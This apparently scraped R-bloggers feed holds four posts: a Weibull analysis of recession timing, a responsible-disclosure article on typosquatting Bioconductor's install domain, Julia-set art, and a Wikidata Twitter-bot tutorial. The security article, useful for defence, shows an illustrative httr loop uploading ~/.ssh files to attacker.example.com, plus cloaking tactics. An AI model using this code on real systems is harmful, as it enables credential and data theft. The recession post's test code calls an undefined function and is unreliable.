Here, the null hypothesis is rejected; there is evidence that the data wasn’t drawn from an exponential distribution.

What do the above two results signify? If we assume that the time between recessions is independent and identically distributed, then there is not evidence against the Weibull distribution, but there is evidence against the exponential distribution. (The exponential distribution is actually a special case of the Weibull distribution, so the second test effectively rules out that special case.) The exponential distribution has the memoryless property; if we say that the time between events follows an exponential distribution, then knowing that it has been, say, $t$ minutes since the last event occurred tells us nothing about when the next event will occur. The Weibull distribution, however, has memory when the shape parameter is not 1. That is, knowing how long it’s been since the last event occurred does change how likely the event is to occur in the near future. (For the parameter estimates I found, a recession seems to become more likely the longer it’s been since the last one.)
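A quick numerical illustration of that distinction (illustrative parameter values, not estimates from the data): for an exponential, the conditional probability of lasting another two units is the same no matter how long you have already waited; for a Weibull with shape above 1, it shrinks as the wait grows.

# Exponential: P(T > s + 2 | T > s) is identical for every s
sapply(c(0, 5, 10), function(s)
  pexp(s + 2, rate = 1/6, lower.tail = FALSE) / pexp(s, rate = 1/6, lower.tail = FALSE))
# Weibull with shape > 1: the same conditional probability falls as s grows
sapply(c(0, 5, 10), function(s)
  pweibull(s + 2, shape = 2.5, scale = 6, lower.tail = FALSE) /
    pweibull(s, shape = 2.5, scale = 6, lower.tail = FALSE))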

We will revisit the goodness of fit later, though.

How Recessions Occur

I do have some personal beliefs about what causes recessions to occur that would lead me to think that the time between recessions does exhibit some form of memory and would also address the point raised by u/must_not_forget_pwd about Australia not having had a recession in decades. This perspective is primarily shaped by two books, [1] and [2].

In short, I agree with the aforementioned reddit user; recessions are not inevitable. The stability of an economy is a characteristic of that economy and some economies are more stable than others. [1] notes that the Canadian economy had a dearth of banking crises in the 19th and 20th centuries, with the most recent one effectively due to the 2008 crisis in the United States. Often the stability of the financial sector (and probably the economy as a whole) is strongly related to the political coalition responsible for drafting the de facto rules that the financial system follows. In some cases the financial sector is politically weak and continuously plundered by the government. Sometimes it’s politically weak and allowed to exist unmolested by the government but is well whipped. Financiers are allowed to make money and the government repays its debts but if the financial sector steps out of line and takes on too much risk it will be punished. And then there’s the situation where the financial sector is politically powerful and able to get away with bad behavior, perhaps even being rewarded for that behavior by government bailouts. That’s the financial system the United States has.

So let’s consider the latter case, where the financial sector is politically powerful. This is where the Minsky narrative (see [2]) takes hold. He describes a boom-and-bust cycle, but critically, the cause of the bust was built into the boom. After a bust, many in the financial sector “learn their lesson” and become more conservative risk-takers. In this regime the economy recovers and some growth resumes. Over time, the financial sector “forgets” the lessons it learned from the previous bust and begins to take greater risks. Eventually these risks become so great that a greater systematic risk appears and the financial sector, as a whole, stands on shaky ground. Something goes wrong (like the bottom falls out of the housing market or the Russian government defaults), the bets taken by the financial sector go the wrong way, and a crisis ensues. The extra wrinkle in the American financial system is that the financial sector not only isn’t punished for the risks they’ve taken, they get rewarded with a bailout financed by taxpayers and the executives who made those decisions get golden parachutes (although there may be a trivial fine).

If the Minsky narrative is correct, then economic booms do die of “old age”, as eventually the boom is driven by increasingly risky behavior that eventually leads to collapse. When the government is essentially encouraging this behavior with blank-check guarantees, the risks taken grow (risky contracts become lotto tickets paid for by someone else when you lose, but you get all the winnings). Taken together, one can see why there could be some form of memory in the time between recessions. Busts are an essential feature of such an economy.

So what about the Australian economy, as u/must_not_forget_pwd brought up? In short, I think the Australian economy is prototyped by the Canadian economy as described in [1] and thus doesn’t follow the rules driving the boom/bust cycle in America. I think the Australian economy is the Australian economy and the American economy is the American economy. One is stable, the other is not. I’m studying the unstable one, not trying to explain the stability of the other.

Are Other Variables Irrelevant?

First, does time matter to when a recession occurs? The short answer is “Yes, duh!” If you’re going to have any meaningful discussion about when a recession will occur you have to account for the time frame you’re considering. A recession within the next 30 years is much more likely than a recession in the next couple months (if only because one case covers the other, but in general a recession should be more likely to occur within a longer period of time than a shorter one).

But I think the question about “does time matter” is more a question about whether an economy essentially remembers how long it has been since the last recession or not. That’s both an economic and statistical question.

What about other variables? Am I saying that other variables don’t matter when I use only time to predict when the next recession occurs? No, that’s not what I’m saying.

Let’s consider regression equations, often of the form

$$ y = \beta_0 + \beta_1 x_1 + \cdots + \beta_k x_k + \varepsilon. $$

I think economists are used to thinking about equations like this as essentially causal statements, but that’s not what a regression equation is, and when we estimate a regression equation we are not automatically estimating a function that needs to be interpreted causally. If a regression equation tells us something about causality, that’s great, but that’s not what they do.

Granted, economics students are continuously being reminded that correlation is not causation, but I think many then start to think that we should not compute a regression equation unless the relationship expressed can be interpreted causally. However, knowing that two variables are correlated, and how they are correlated, is often useful.

When we compute a regression function from data, we are computing a function that estimates conditional expectations. This function, when given the value of one variable, tells us what value we can expect for the other variable. That relationship may or may not be due to causality, but the fact that the two variables are not independent of each other can be, in and of itself, a useful fact.
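In symbols (a standard statement of this point, not from the original post): the fitted regression estimates the conditional mean function

$$ m(x) = E[Y \mid X = x], $$

and nothing in that definition requires the association between $X$ and $Y$ to be causal.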

My favorite example in the “correlation is not causation” discussion (probably mentioned first in some econometrics textbook or by my econometrics professor) is the relationship between the damage caused by a fire and the number of firefighters at the scene of the fire. Let’s just suppose that we have some data, where $y$ is the amount of damage in a fire (in thousands of dollars) and $x$ is the number of firefighters, and we estimated a relationship of the form $\hat{y} = b_0 + b_1 x$ with $b_1 > 0$.

There is a positive relationship between the number of firefighters at the scene of the fire and the damage done by the fire. Does this mean that firefighters make fires worse? No, it does not. But if you’re a spectator and you see ten firefighters running the scene of a fire, can you expect the fire to be more damaging than fires where there are five firefighters and not as damaging as fires with fifteen firefighters? Sure, this is reasonable. Not only that, it’s a useful fact to know.

Importantly, when we choose the variables to include in a regression equation, we are deciding what variables we want to use for conditioning. That choice could be motivated by a causal model (because we care about causality), or by model fit (making the smallest error in our predictions while being sufficiently simple), or simply by what’s available. Some models may do better than others at predicting a variable but they all do the same thing: compute conditional expectations.

My point is this: when I use time as the only variable of interest when attempting to predict when a recession occurs, I’m essentially making a prediction based on a model that conditions only on time and nothing else. That’s not the same thing as saying that excluded variables don’t matter. Rather, a variable excluded in the model is effectively treated as being a part of the random soup that generated the data I observe. I’m not conditioning on its values to make predictions. Could my prediction be refined by including that information? Perhaps. But that doesn’t make the prediction automatically useless. In fact, I think we should start with predictions that condition on little to see if conditioning on more variables adds any useful information, generally preferring the simple to the complex given equal predictive value. This is essentially what most F-tests automatically reported with statistical software do; they check if the regression model involving possibly multiple parameters does any better than one that only uses the mean of the data to predict values.

I never looked at a model that uses more information than just time, though. I wouldn’t be shocked if using more variables would lead to a better model. But I don’t have that data, and to be completely honest, I don’t want to spend the time to try and get a “great” prediction for when the next recession will occur. My numbers are essentially a back-of-the-envelope calculation. It could be improved, but just because there’s (perhaps significant) room for improvement doesn’t render the calculation useless, and I think I may have evidence that shows the calculation has some merit.

The reddit user had a long discussion about how well the economy would function if predicting the time between recessions only depended on time, that the Federal Reserve would head off every recession and investors would be adjusting their behavior in ways that render the calculation useless. My response is this: I’m not a member of the Fed. I have no investments. My opinion doesn’t matter to the economy. Thus, it’s okay for me to treat the decisions of the Fed, politicians, bank presidents, other investors, and so forth, as part of that random soup producing the economy I’m experiencing, because my opinions do not invalidate the assumptions of the calculation.

There is a sense in which statistics are produced with an audience in mind. I remember Nate Silver making this point in a podcast (don’t ask me which) when discussing former FBI director James Comey’s decision, just days before the 2016 presidential election, to announce a reopening of an investigation into Hillary Clinton’s e-mails, which was apparently at least partially driven by the belief that Clinton was very likely to win. Silver said that Comey did not account for the fact that he was a key actor in the process he was trying to predict and that his decisions could change the likelihood of Clinton winning. He invalidated the numbers with his decision based on them. He was not the target audience of the numbers Nate Silver was producing.

I think a similar argument can be made here. If my decisions and beliefs mattered to the economy, then I should account for them in predictions, conditioning on them. But they don’t matter, so I’ve invalidated nothing, and the people who do matter likely are (or should be) reaching conclusions in a much more sophisticated way.

A Second Look at Goodness of Fit

I’m a statistician. Statistics is my hammer. Everything looks like a nail to me. You know why? Because hammering nails is fun.

When I read u/must_not_forget_pwd’s critique, I tried to formulate it in a mathematical way, because that’s what I do. Here’s my best way to describe it in mathematical terms:

  1. The time between recessions are all independent of one another.
  2. Each period of growth follows its own distribution, with its own unique parameters.
  3. The time separating recessions is memoryless. Knowing how long it has been since the last recession tells us nothing about how much longer we have till the next recession.

I wanted a model that one might call “maximum unpredictability”. So if $T_1, \ldots, T_n$ are the times separating recessions, then points 1, 2, and 3 together say that $T_1, \ldots, T_n$ are independent random variables with $T_i \sim \mathrm{EXP}(\lambda_i)$, and there’s no known relationship between $\lambda_1, \ldots, \lambda_n$. If this is true, we have no idea when the next recession will occur because there’s no pattern we can extract.

My claim is essentially that $T_i \sim \mathrm{WEI}(k, \lambda)$, with $k \neq 1$ and there’s only one pair $(k, \lambda)$ shared by every $T_i$. If I were to then attempt to formulate these as statistical hypotheses, those hypotheses would be:

$H_0$: $T_1, \ldots, T_n$ are i.i.d. $\mathrm{WEI}(k, \lambda)$

$H_A$: the $T_i$ are independent with $T_i \sim \mathrm{EXP}(\lambda_i)$, each with its own $\lambda_i$

Is it possible to decide between these two hypotheses? They’re not nested and it’s not really possible to use the generalized likelihood ratio test because the parameter space that includes both $H_0$ and $H_A$ is too big (you’d have to estimate at least as many parameters as you have data points). That said, they both suggest likelihood functions that, individually, can be maximized, and you might consider using the ratio between these two maximized functions as a test statistic. (Well, actually, the negative log likelihood ratio, which I won’t write down in math or try to explain unless asked, but you can see the end result in the code below in the definition of ts().)

Could that statistic be used to decide between the two hypotheses? I tried searching through literature (in particular, see [3]) and my conclusion is… maybe? To be completely honest, by this point we’ve left the realm of conventional statistics and are now turning into mad scientists, because not only are the hypotheses we’re testing and the statistic we’re using to decide between them just wacky, how the hell are we supposed to know the distribution of this test statistic under the null hypothesis when there are two nuisance parameters that likely aren’t going anywhere? Oh, and while we’re at it, the sample size of the data set of interest is really small, so don’t even think about using asymptotic reasoning!

I think you can see how this descent into madness would end up with me discovering the maximized Monte Carlo test (see [4]) and then writing MCHT to implement it. I’ll try anything once, so the product of all that sweat and labor is below.

ts <- function(x) {
  n <- length(x)
  params <- coef(fitdist(x, "weibull"))
  k <- params[["shape"]]
  l <- params[["scale"]]
  (n * k - n + 1) * log(l) - log(k) + sum(l * (-k) * x^k - k * log(x)) - n
}

mcsg <- function(x, shape = 2, scale = 1) {
  x <- qweibull(x, shape = shape, scale = scale)
  test_stat(x)
}

brg <- function(x) {
  n <- length(x)
  params <- coef(fitdist(x, "weibull"))
  k <- params[["shape"]]
  l <- params[["scale"]]
  rweibull(n, shape = k, scale = l)
}

mc.mem.test <- MCHTest(ts, mcsg, seed = 123,
                       nuisance_params = c("shape", "scale"), N = 1000,
                       optim_control = list(
                         "lower" = c("shape" = 0, "scale" = 0),
                         "upper" = c("shape" = 100, "scale" = 100),
                         "control" = list("max.time" = 60)),
                       threshold_pval = 0.2, localize_functions = TRUE,
                       method = "MMC Test for IID With Memory")

b.mem.test <- MCHTest(ts, ts, brg, seed = 123, N = 1000,
                      method = "Bootstrap Test for IID With Memory")

b.mem.test(recessions)
##
##  Bootstrap Test for IID With Memory
##
## data: recessions
## S = -4601.9, p-value = 0.391

mc.mem.test(recessions)
## Warning in mc.mem.test(recessions): Computed p-value is greater than
## threshold value (0.2); the optimization algorithm may have terminated early
##
##  MMC Test for IID With Memory
##
## data: recessions
## S = -4601.9, p-value = 0.962

Both tests failed to reject the null hypothesis. Unfortunately that doesn’t seem to say much. First, it doesn’t show the null hypothesis is correct; it’s just not obviously incorrect. This is always the case, but the bizarre test I’m implementing here is severely underpowered, perhaps to the point of being useless. The alternative hypothesis (which I assigned to my “opponent”) is severely disadvantaged.

The conclusion of the above results isn’t in fact that I’m right. Given the severe lack of power of the test, I would say that the results of the test above are essentially inconclusive.

Conclusion

I’m going to be straight with you: if you read this whole article, I probably wasted your time, and for that I am truly sorry.

I suppose you got to enjoy some stream-of-consciousness thoughts about a controversial blog post I wrote, where I made a defense that may or may not be convincing, then watched as I developed a strange statistical test that probably didn’t even work in order to settle a debate with some random guy on reddit, attributing to him a claim he would honestly likely deny, and ended that imaginary argument inconclusively.

But hey, at least I satisfied my curiosity. And I’m pretty proud of MCHT, which I created to help me write this blog post. Maybe if I hadn’t spent three straight days writing nothing but blog posts, this one would have been better, but the others seemed pretty good. So something good came out of this trip… right?

Maybe I can end like this: do I still think that a recession before the 2020 election is likely? Yes. Do I think that a Weibull describes the time between recessions decently? Conditioning on nothing else, I think so. I still think that my previous work has some merit as a decent back-of-the-envelope calculation. Do I think that the time between recessions has a memory? In short, yes. And while we’re on the topic, I’m not the Fed, so my opinions don’t matter.

All that said, though, smarter people than me may have different opinions and their contributions to this discussion are probably more valuable than mine. For instance, the people at Goldman Sachs believe a recession soon is unlikely; but the people at J.P. Morgan Chase believe a recession could strike in 2020. I’m certainly persuadable on the above points, and as I’ve said before, I think the simple analysis could enhance the narrative advanced by better predictions.

Now that I’ve written this post, we will return to our regularly scheduled programming. Thanks for reading! (Please don’t judge me.)

References
  1. C. Calomiris and S. Haber, Fragile by design: the political origins of banking crises and scarce credit (2014), Princeton University Press, Princeton
  2. H. P. Minsky, Stabilizing an unstable economy (1986), Yale University Press, New Haven
  3. D. R. Cox, Tests of separate families of hypotheses, Proc. Fourth Berkeley Symp. on Math. Stat. and Prob., vol. 1 (1961) pp. 105-123
  4. J-M Dufour, Monte Carlo tests with nuisance parameters: A general approach to finite-sample inference and nonstandard asymptotics, Journal of Econometrics, vol. 133 no. 2 (2006) pp. 443-477

Packt Publishing published a book for me entitled Hands-On Data Analysis with NumPy and Pandas, a book based on my video course Unpacking NumPy and Pandas. This book covers the basics of setting up a Python environment for data analysis with Anaconda, using Jupyter notebooks, and using NumPy and pandas. If you are starting out using Python for data analysis or know someone who is, please consider buying my book or at least spreading the word about it. You can buy the book directly or purchase a subscription to Mapt and read it there.

If you like my blog and would like to support it, spread the word (if not get a copy yourself)!


To leave a comment for the author, please follow the link and comment on their blog: R – Curtis Miller's Personal Website.

Hacking Bioconductor

Mon, 11/19/2018 - 11:23

(This article was first published on r – Jumping Rivers, and kindly contributed to R-bloggers)

Introduction

Domain squatting or URL hijacking is a straightforward attack that requires little skill. An attacker registers a domain that is similar to the target domain and hopes that a user accidentally visits the site. For example, if the domain is example.com, then a typo-squatter would register similar domains such as

  • common misspelling: examples.com
  • misspellings based on omitted letters: exampl.com
  • misspellings based on typos: ezample.com
  • a different top-level domain: example.co.uk

The cost of registering a single domain is approximately £10 for two years.

With the rise of data science and the widespread use of tools such as R, Python and Matlab, programming has moved from the domain of computing scientists to users who have no formal training. Coupled with this is the vast amount of additional free packages available. For example, R has over 12,000 packages on its main repository, CRAN. These packages cover everything from clinical trials to machine learning. Installation of these packages does not go through a traditional IT approach, where a user contacts their IT officer asking for packages to be installed. Instead, users simply install the required packages on their own machine. Crucially, installing these packages does not require admin rights. This shift from a centrally managed IT infrastructure to a user-centred approach can be difficult to manage.

We now regularly perform Shiny and R related security health checks. Contact us if you want further details.

Example: Bioconductor project

To make this article concrete, while simultaneously not overstepping the ethical bounds, we used URL hijacking to target Bioconductor. The Bioconductor project provides tools for the analysis and understanding of high-throughput genomic data. The project uses the R programming language and has over 1,300 associated R packages.

To install Bioconductor, users are instructed to run the R script

source("https://bioconductor.org/biocLite.R")

This loads the biocLite() function that enables installation of other R packages. Two points are worth noting:

  • Bioconductor has a large user community.
  • The typical Bioconductor user is analysing cutting-edge biological datasets and therefore likely to be in a University, pharmaceutical company, or government agency. Their data is almost certainly sensitive, which could include patient data or results on upcoming drug trials.

We registered eleven domains: biconductor.org, biocnductor.org, biocoductor.org, biocondctor.org, bioconducor.org, bioconducto.org, bioconductr.org, biocondutor.org, bioconuctor.org, bioonductor.org, boconductor.org

Each domain name is a simple misspelling of bioconductor.

When the source() function is used to access a website, it sends a user agent giving the version of R being used and the operating system. For example, the user agent

R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)

indicates R version 3.4.2 on a Windows machine. The machine’s location (IP address) is also passed to the server. Whenever a machine accesses a domain, this information is automatically recorded.
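For reference, the user agent string R sends is base R behaviour (not something specific to Bioconductor) and can be inspected directly; it is built roughly from the R version and platform information:

getOption("HTTPUserAgent")
# [1] "R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)"   # example value on a Windows machine

# constructed roughly as:
sprintf("R (%s)", paste(getRversion(), R.version$platform, R.version$arch, R.version$os))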

For each of the eleven domains, we monitored the server logs for occurrences of the R user-agent. Whenever anyone accessed our rogue domains we always returned a 404 (not found) error message. It is worth noting that while SSL (https) is essential for a secure connection, in this scenario it just provides a secure connection to the rogue domain, i.e. it does not offer any additional protection.

Did it work?

We monitored the eleven domains for five months, starting in January 2018. As expected, some domains are clearly more popular than others. The top three domains (bioconducor.org, biconductor.org and biocondutor.org) accounted for most of the traffic.

Figure: number of unique hits per day, per domain, over the five-month monitoring period. To avoid duplication, a particular IP address is only counted once per day. Only hits that had the R user agent are counted.

A summary of the results:

  • Thirty-three countries
  • 168 unique Universities, with most of the top 10 Universities in the world represented
  • Many Research Institutes
  • A number of Pharma companies and charities

Is it really a big deal?

Once the user has executed our R script, we are free to run any R commands we wish. An attacker targeting users installing Bioconductor would probably look for commercially sensitive material.

The first step for an attacker to retrieve information from a user’s machine would be to install the httr R package using the command

install.packages("httr")

This package provides functionality for uploading files to external web servers. A more nefarious technique would be to detect whether Dropbox or another cloud storage client is present on the machine and leverage that via an associated R package.

The next step would be to determine which files are on the system. This is particularly easy since R is cross-platform. Using base R, we can list all files under a user's home area with

list.files("~/", recursive = TRUE, full.names = TRUE)

An attacker could either upload all files or cherry-pick particular directories, such as those that contain security credentials, e.g. ssh keys. With approximately three lines of standard R code, the attacker could upload all files from a user's home area to an external server.
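A hypothetical sketch of that kind of exfiltration with httr might look like the following; the receiving URL is invented and the snippet is purely illustrative:

library(httr)
credential_files <- list.files("~/.ssh", recursive = TRUE, full.names = TRUE)
for (f in credential_files) {
  # multipart upload of each file to a server controlled by the attacker
  POST("https://attacker.example.com/upload", body = list(file = upload_file(f)))
}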

An attacker could also refine their attack with little effort. For example, a simple message displayed at the start of an attack, such as

The Bioconductor server is experiencing heavy use today; hence the installation process will take slightly longer than usual, please be patient. Sorry for your inconvenience.

would give the attacker more time. A sophisticated variation would be to delay file uploads until the user is away from the computer, while simultaneously installing Bioconductor and allowing the user to proceed as normal.

Detecting an attack would also be difficult as an attacker can modify their response based on the user-agent. For example, if in R we run the command

source("http://www.mas.ncl.ac.uk/~ncsg3/R/evil_r.R")

the server detects an R user agent and returns R code. However, visiting the site via a browser, such as Internet Explorer, results in a “page not found” error. An attacker could also cache the IP addresses of visitors. This would enable them to launch an attack the first time a user visits the page, while all subsequent visits result in a redirect to the correct Bioconductor site.
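In plain R, the decision such a rogue server makes could be sketched as follows (this is pseudologic for illustration, not actual server code):

serve_request <- function(user_agent) {
  if (grepl("^R \\(", user_agent)) {
    "R code"          # an R session sourcing the file receives malicious R code
  } else {
    "404 Not Found"   # a human checking the URL in a browser sees nothing suspicious
  }
}
serve_request("R (3.4.2 x86_64-w64-mingw32 x86_64 mingw32)")
serve_request("Mozilla/5.0 (Windows NT 10.0; Win64; x64)")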

Other Attack Avenues

Bioconductor is not the only attack vector that could be exploited. Many R users install the latest versions of packages from GitHub (or other online repositories). The most common method of installing a GitHub package is to use the function install_github(). The first argument of this function is a combination of the GitHub username and the repository name. For example, to install the latest version of the ggplot2 package, the user/organisation is tidyverse and the repository name is ggplot2, so the argument to the install_github() function would be tidyverse/ggplot2:

install_github("tidyverse/ggplot2")

As with the mechanism employed by Bioconductor, there is nothing wrong with this particular method of package installation. However, like Bioconductor, because many users install packages in this manner, it would be relatively simple to register a similar username; we have actually registered the username tidyversee but did not create a ggplot2 repository.

While the tidyverse repository is one of the most popular GitHub repositories, it would be relatively easy to script an attack on all packages hosted on GitHub. Creating similar usernames and cloning the targeted repositories would create thousands of possible attack vectors.

This security vulnerability is implicitly present whenever a user installs packages or libraries. For example, in Python, users can install packages via the popular pip tool from the PyPI repository. However, a malicious attacker can upload a Python package to this repository with a similar name to a current package and thereby gain control of a user's system via URL hijacking.

Reporting vulnerabilities

We actually discovered this issue mid-way through 2017. After contacting the maintainers of Bioconductor, we waited until the mechanism for installing Bioconductor packages was changed to

## A CRAN package
BiocManager::install()

This happened with the release of R 3.5.0. We then waited a few more months just to be sure.

Shiny and R Health Checks

One of our main tasks at Jumping Rivers (https://www.jumpingrivers.com/consultancy/) is to help set up R infrastructure and perform R related security health checks. If you need advice or help, please contact us for further details.

The post Hacking Bioconductor appeared first on Jumping Rivers.


Flowers for Julia

Mon, 11/19/2018 - 08:00

(This article was first published on R – Fronkonstin, and kindly contributed to R-bloggers)

Don't talk about the future, it's an illusion, when Rock & Roll conquered my heart (El Rompeolas, Loquillo y los Trogloditas)

In this post I create flowers inspired by the Julia sets, a family of fractal sets obtained from complex numbers iterated by a holomorphic function. Despite the ugly previous definition, the mechanism to create them is quite simple:

  • Take a grid of complex numbers between -2 and 2 (both real and imaginary parts).
  • Take a function of the form f(z) = z^n + c, setting the parameters n and c.
  • Iterate the function over the complex numbers several times. In other words: apply the function to each complex number, apply it again to the output, and repeat this process a number of times.
  • Calculate the modulus of the resulting number.
  • Represent the initial complex number in a scatter plot where the x-axis corresponds to the real part and the y-axis to the imaginary part. Color the point depending on the modulus of the resulting number after applying the function iteratively.

This image corresponds to a grid of 9 million points and 7 iterations of the function :
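A minimal sketch of the recipe above (this is not the author's code, which is linked at the end of the post) produces a similar image on a much smaller grid; the exponent and the constant c used here are arbitrary choices:

library(ggplot2)

n    <- 5                                      # exponent of the map (assumed)
cpar <- complex(real = -0.6, imaginary = 0.3)  # constant c (assumed)

grid <- expand.grid(re = seq(-2, 2, length.out = 400),
                    im = seq(-2, 2, length.out = 400))
z0   <- complex(real = grid$re, imaginary = grid$im)

# Reduce() applies the map repeatedly without an explicit loop
z7  <- Reduce(function(z, k) z^n + cpar, x = 1:7, init = z0)
mod <- Mod(z7)
mod[!is.finite(mod)] <- 1e6                    # points that blew up count as diverged
grid$mod <- log1p(pmin(mod, 1e6))

ggplot(grid, aes(re, im, fill = mod)) +
  geom_raster() +
  coord_equal() +
  theme_void() +
  theme(legend.position = "none")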

To color the points, I pick a random palette from the top list of the COLOURlovers site using the colourlovers package. Since each flower involves a huge amount of calculation, I use Reduce to make this process efficient. More examples:

There are two little Julias in the world to whom I would like to dedicate this post. I wish them all the best in the world and I am sure they will discover the beauty of mathematics. These flowers are yours.

The code is available here.


Tweeting wikidata info

Mon, 11/19/2018 - 01:00

(This article was first published on Category R on Roel's R-tefacts, and kindly contributed to R-bloggers)

In this explainer I walk you through the steps I took to create a twitter bot
that tweets daily about people who died on that date.

I created a script that queries wikidata, takes that information and creates
a sentence. That sentence is then tweeted.

For example:

A tweet I literally just sent out from the docker container

I hope you are as excited as I am about this project. Here it comes!

There are four parts:

  1. Talk to wikidata and retrieve information about 10 people that died today
  2. Grab one of the deaths and create a sentence
  3. Post that sentence to twitter in the account wikidatabot
  4. Throw it all into a docker container so it can run on the computer of someone else (AKA: THA CLOUD)

You might wonder, why people who died? To which I answer, emphatically but not
really helpfully: ‘valar morghulis’.

1. Talk to wikidata and retrieve information

I think wikidata is one of the coolest knowledge bases in the world: it contains facts about people, other animals, places, and the world. It powers many boxes you see on Wikipedia pages. For instance, this random page about Charles the First has a box on the right that says something about his ancestors, successors and coronation. The same information can be displayed in Dutch. This is very cool and saves Wikipedia a lot of work. However, we can also use it!

You can create your own query about the world in the query editor, but it is quite hard to figure out how to do that. These queries need to be made in a specific way. I just used an example from wikidata, 'whose birthday is it today?', and modified it to search for people's deaths (that's how I learn: modify something and see if I broke it). It looks a lot like SQL, but is slightly different.

Of course this editor is nice for us humans, but we want the computer to do it so we can send a query to wikidata programmatically. I was extremely lazy and used the WikidataQueryServiceR package created by wiki-guru Mikhail Popov (@bearloga, https://twitter.com/bearloga).

This is the query I ended up using (It looks very much like the birthdays one
but with added information):

querystring <- 'SELECT  # what variables do you want to return (defined later on)
  ?entityLabel
  (YEAR(?date) AS ?year)
  ?cause_of_deathLabel
  ?place_of_deathLabel
  ?manner_of_deathLabel
  ?country_of_citizenshipLabel
  ?country_of_birth
  ?date_of_birth
WHERE {
  BIND(MONTH(NOW()) AS ?nowMonth)  # this is a very cool trick
  BIND(DAY(NOW()) AS ?nowDay)
  ?entity wdt:P570 ?date.
  SERVICE wikibase:label { bd:serviceParam wikibase:language "en". }
  ?entity wdt:P509 ?cause_of_death.
  OPTIONAL { ?entity wdt:P20 ?place_of_death. }
  OPTIONAL { ?entity wdt:P1196 ?manner_of_death. }
  FILTER(((MONTH(?date)) = ?nowMonth) && ((DAY(?date)) = ?nowDay))
  OPTIONAL { ?entity wdt:P27 ?country_of_citizenship. }
  OPTIONAL { ?entity wdt:p19 ?country_of_birth}
  OPTIONAL { ?entity wdt:P569 ?date_of_birth.}
}
LIMIT 10'

Try this in the query editor

When I created this blog post (every day the result will be different)
the result looked like this:

library(WikidataQueryServiceR)
result <- query_wikidata(querystring)
## 10 rows were returned by WDQS
result[1:3, 1:3]  # first 3 rows, first 3 columns
##                  entityLabel year cause_of_deathLabel
## 1 Rafael García-Plata y Osma 1918           influenza
## 2        Dobroslava Menclová 1978       traffic crash
## 3             Alan J. Pakula 1998       traffic crash

The query returns name, year, cause of death, manner of death
(didn’t know which one to use), place of death, country of citizenship, country
of birth and date of birth.
I can now glue all these parts together to create a sentence of sorts.

2. Grab one of the deaths and create a sentence

I will use glue to make the text, but the paste functions from base R are also fine.

These are the first lines for instance:

library(glue)
glue_data(result[1:2, ],
          "Today in {year} in the place {place_of_deathLabel} died {entityLabel} with cause: {cause_of_deathLabel}. {entityLabel} was born on {as.Date(date_of_birth, '%Y-%m-%d')}. Find more info on this cause of death on www.en.wikipedia.org/wiki/{cause_of_deathLabel}. #wikidata")
## Today in 1918 in the place Cáceres died Rafael García-Plata y Osma with cause: influenza. Rafael García-Plata y Osma was born on 1870-03-04. Find more info on this cause of death on www.en.wikipedia.org/wiki/influenza. #wikidata
## Today in 1978 in the place Plzeň died Dobroslava Menclová with cause: traffic crash. Dobroslava Menclová was born on 1904-01-02. Find more info on this cause of death on www.en.wikipedia.org/wiki/traffic crash. #wikidata

3. Post that sentence to twitter in the account wikidatabot

I created the twitter account wikidatabot and added pictures, 2FA and some bio information. I wanted to make it clear that it was a bot. Posting something on your behalf on twitter requires a developer account. Go to https://developer.twitter.com and create that account. In my case I had to verify manually twice because apparently everything I did screamed bot activity to twitter (they were not entirely wrong). You have to tick some boxes, acknowledge the code of conduct and understand twitter’s terms.

The next step is to create a twitter app, but I will leave that explanation to the rtweet vignette, because it is very helpful.

When you’re done, you can post to twitter on your account with the help of a consumer key, consumer secret, access token and access token secret. You will need them all and you will have to keep them secret (or other people can post on your account, and that is something you really don’t want).

With those secrets and the rtweet package you can create a token that enables
you to post to twitter.
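A minimal sketch of that step (the environment variable names below are hypothetical; the create_token() arguments are as documented in the rtweet vignette at the time):

library(rtweet)

token <- create_token(
  app             = "wikidatabot",
  consumer_key    = Sys.getenv("TWITTER_CONSUMER_KEY"),
  consumer_secret = Sys.getenv("TWITTER_CONSUMER_SECRET"),
  access_token    = Sys.getenv("TWITTER_ACCESS_TOKEN"),
  access_secret   = Sys.getenv("TWITTER_ACCESS_SECRET")
)

Reading the secrets from environment variables rather than hard-coding them also addresses one of the improvement points listed at the end of this post.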

And it is seriously as easy as:

rtweet::post_tweet(status = tweettext, token = token )

Again the same tweet

4. Throw it all into a docker container

I want to post this every day, but to make it run in the cloud it would be nice if R and the code were nicely packed together. That is where docker comes in: you define what packages you want, and a mini operating system is created that will run for everyone on every computer (if they have docker). The whole example script and docker file can be found here on github.

And that’s it. If you have suggestions on how to run it every day in the cloud
for cheap, let me know by twitter or by opening an issue on github.

Things that could be done better:
  • I can run the container, but I don’t know how to make it run in the cloud
  • I ask for 10 deaths and pick one randomly; I don’t know if there is a random function in sparql
  • I put the (twitter) keys into the script; it would be better to use environment variables for that
  • rtweet and WikidataQueryServiceR have lots of dependencies that make the docker container difficult to build (mostly time consuming)
  • I guess I could just build the query and post to wikidata, but using WikidataQueryServiceR was much faster
  • I wish I knew how to use the rocker/tidyverse container to run a script, but I haven’t figured that out yet

State of the machine

At the moment of creation (when I knitted this document) this was the state of my machine:

sessioninfo::session_info()
## ─ Session info ──────────────────────────────────────────────────────────
##  setting  value
##  version  R version 3.5.1 (2018-07-02)
##  os       Ubuntu 16.04.5 LTS
##  system   x86_64, linux-gnu
##  ui       X11
##  language en_US
##  collate  en_US.UTF-8
##  tz       Europe/Amsterdam
##  date     2018-11-19
##
## ─ Packages ──────────────────────────────────────────────────────────────
##  package               * version date       source
##  backports               1.1.2   2017-12-13 CRAN (R 3.5.0)
##  blogdown                0.8     2018-07-15 CRAN (R 3.5.1)
##  bookdown                0.7     2018-02-18 CRAN (R 3.5.0)
##  clisymbols              1.2.0   2017-05-21 CRAN (R 3.5.0)
##  crayon                  1.3.4   2017-09-16 CRAN (R 3.5.0)
##  curl                    3.2     2018-03-28 CRAN (R 3.5.0)
##  digest                  0.6.15  2018-01-28 CRAN (R 3.5.0)
##  evaluate                0.11    2018-07-17 CRAN (R 3.5.1)
##  glue                  * 1.3.0   2018-07-17 CRAN (R 3.5.1)
##  htmltools               0.3.6   2017-04-28 CRAN (R 3.5.0)
##  httr                    1.3.1   2017-08-20 CRAN (R 3.5.0)
##  knitr                   1.20    2018-02-20 CRAN (R 3.5.0)
##  magrittr                1.5     2014-11-22 CRAN (R 3.5.0)
##  R6                      2.2.2   2017-06-17 CRAN (R 3.5.0)
##  Rcpp                    0.12.18 2018-07-23 cran (@0.12.18)
##  rmarkdown               1.10    2018-06-11 CRAN (R 3.5.0)
##  rprojroot               1.3-2   2018-01-03 CRAN (R 3.5.0)
